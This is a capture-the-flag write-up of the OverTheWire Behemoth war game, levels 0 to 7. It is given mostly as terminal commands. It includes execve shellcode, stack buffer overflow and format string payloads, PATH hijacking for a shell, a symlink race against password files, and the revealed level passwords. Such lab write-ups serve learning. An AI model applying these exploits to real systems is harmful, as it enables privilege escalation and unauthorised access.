What follows is a write-up of a binary exploitation war game, OverTheWire Behemoth.
The war game has players “deal with a lot of regular vulnerabilities found out in the wild.” Players get to exploit vulnerabilities such as buffer overflows, race conditions and privilege escalation.
Note that no source code is given, hence there is no clear challenge description but for comprising the system. The players get a flag if they succeed in compromising the system.
[*] STATUS: COMPLETED
Level 0
Solution:
cd /behemoth
file behemoth0
ltrace ./behemoth0
# Running a library call tracer
Input: aaaa
# strcmp() shows us the correct password
./behemoth0
Input: eatmyshorts
cat /etc/behemoth_pass/behemoth1
Flag: aesebootiv
Level 1
Solution:
cd /behemoth
ltrace ./behemoth1
Input: aaaa
”’
gets() is being used with a 191 size limit
gets() doesn’t stop writing at the end of the size limit, instead continuing to write past the end and into memory it doesn’t own
We can trigger a buffer overflow
Let us reuse our good ol’ 25-byte shellcode
”’
export EGG=”$(python -c ‘print (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″)’)”
gdb -q ./behemoth1
disas main
br *main+50
r
Input: aaaa
x/50x $esp+600
# The 90’s preceding our shellcode start at 0xffffd8a8
”’
We are going to use Metasploit pattern_create.rb and pattern_offset.rb
pattern_create.rb will create a unique pattern for us
We will feed the program this pattern and then note the value it outputs
We will then use this value with pattern_offset.rb to determine at which point
in our pattern the value appears – that will be our offset
”’
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150
# We create a pattern
Copy the output
r
Input: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
n
# Note the output: 0x63413663
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x63413663
# Our offset is at 79
q
(python -c ‘print (“A” * 79) + (“\xb8\xd8\xff\xff”)’;cat) | /games/behemoth/behemoth1
cat /etc/behemoth_pass/behemoth2
Flag: eimahquuof
Level 2
Solution:
cd /behemoth
ltrace ./behemoth2
# We need to get around this touch restriction, which seems to be the key point
# The program is set to run whatever ‘touch’ is
cd /tmp
mkdir peanuts
cd peanuts
ln -s /behemoth/behemoth2 behemoth2
# Create a symbolic link
echo “/bin/sh” > touch
chmod +x ./touch
# Create a fake ‘touch’ that gets us a shell
export PATH=/tmp/peanuts/:$PATH
# Set a new fake path
./behemoth2
cat /etc/behemoth_pass/behemoth3
Flag: nieteidiel
Level 3
Solution:
cd /behemoth
file behemoth3
ltrace ./behemoth3
gdb -q ./behemoth3
disas main
r
Input: aaaabbbb.%x.%x.%x.%x.%x.%x.%x.%x
# The program has a format string vulnerability
# Our offset is at 6
q
objdump -R behemoth3
# We are going to overwrite the puts() in the global offset table
# puts() address is 0x08049790
export EGG=”$(python -c ‘print (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″)’)”
gdb -q ./behemoth3
br *main+95
r
Input: aaaa
x/50x $esp+600
# The 90’s preceding our shellcode start at 0xffffd8b4
”’
Let’s use the magic formula to calculate our format string exploit:
[addr][addr + 2] = \x90\x97\x04\x08\x92\x97\x04\x08
%.[LOB – 8]c = d8b4 = 55476 – 8 = %.55468c
%[offset]$hn = %6\$hn
%.[HOB – LOB]c = ffff – d8b4 = %.10059c
%[offset + 1]$hn = %7\$hn
”’
q
# For this challenge we are going to need to have the payload in a file
cd /tmp
mkdir pancakes
cd pancakes
vi behemoth_3.py
# See behemoth_3.py
python behemoth_3.py
(cat attack.txt ; cat) | /behemoth/behemoth3
cat /etc/behemoth_pass/behemoth4
Flag: ietheishei
Level 4
Solution:
cd /behemoth
ltrace ./behemoth4
# The key point for this challenge is the PID of a program under the tmp folder
# In my case the PID was 8040
objdump -R ./behemoth4
# Notice the fopen and fgetc
ltrace ./behemoth4
echo “babecafe” > /tmp/8040
gdb -q ./behemoth4
disas main
r
# PID not found
q
ltrace ./behemoth4
”’
The PID changes
We are going to need to write a program that runs the application, pauses execution for a few seconds, and creates a symbolic link between the password file and a file with the appropriate PID
We will use the ‘kill’ command for this purpose
”’
cd /tmp
mkdir beh_4
cd beh_4
vi kill_it.sh
# See kill_it.sh
chmod +x kill_it.sh
# Give it execution permissions
./kill_it.sh
Flag: aizeeshing
Level 5
Solution:
cd /behemoth
ltrace ./behemoth5
# Notice fopen() is set to read the password
# Also notice the use of socket and sendto
strings behemoth5
# We can see the host (localhost) and port (1337)
Open another session in another tab
In second tab: netcat -ul 1337
In first tab: ./behemoth5
Flag: mayiroeche
Level 6
Solution:
cd /behemoth
ltrace ./behemoth6_reader
# It attempts to open “shellcode.txt” for reading
ltrace ./behemoth6
# This opens the reader and compares its output to “HelloKitty”
# This means we need to write shellcode that prints out “HelloKitty”
In another tab: vi hello_kitty.asm
# See hello_kitty.asm
nasm -f elf hello_kitty.asm -o hello_kitty.o
ld -m elf_i386 hello_kitty.o -o hello_kitty
objdump -d hello_kitty
# We dump the opcodes to write to shellcode.txt
mkdir /tmp/kitty
cd /tmp/kitty
python -c ‘print “\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x0a\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x65\x6c\x6c\x6f\x4b\x69\x74\x74\x79″‘ > shellcode.txt
/behemoth/behemoth6
cat /etc/behemoth_pass/behemoth7
Flag: baquoxuafo
Level 7
Solution:
cd /behemoth
ltrace ./behemoth7
gdb -q ./behemoth7
r
# Nothing seems to happen
r $(python -c ‘print “A” * 500’)
r $(python -c ‘print “A” * 600’)
# We get a segmentation fault with A’s in EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
# We create a pattern
Copy the output
r $(python -c ‘print “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9″‘)
# Note the output: 0x39724138
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x39724138
# Our offset is at 536
r $(python -c ‘print (“A” * 536) + “BBBB” + (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”)’)
x/50x $esp
# We choose an address in the middle of our NOP sled: 0xffffd460
./behemoth7 $(python -c ‘print (“A” * 536) + (“\x60\xd4\xff\xff”) + (“\x90” * 100) + (“\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80”)’)
cat /etc/behemoth_pass/behemoth8
Flag: pheewij7Ae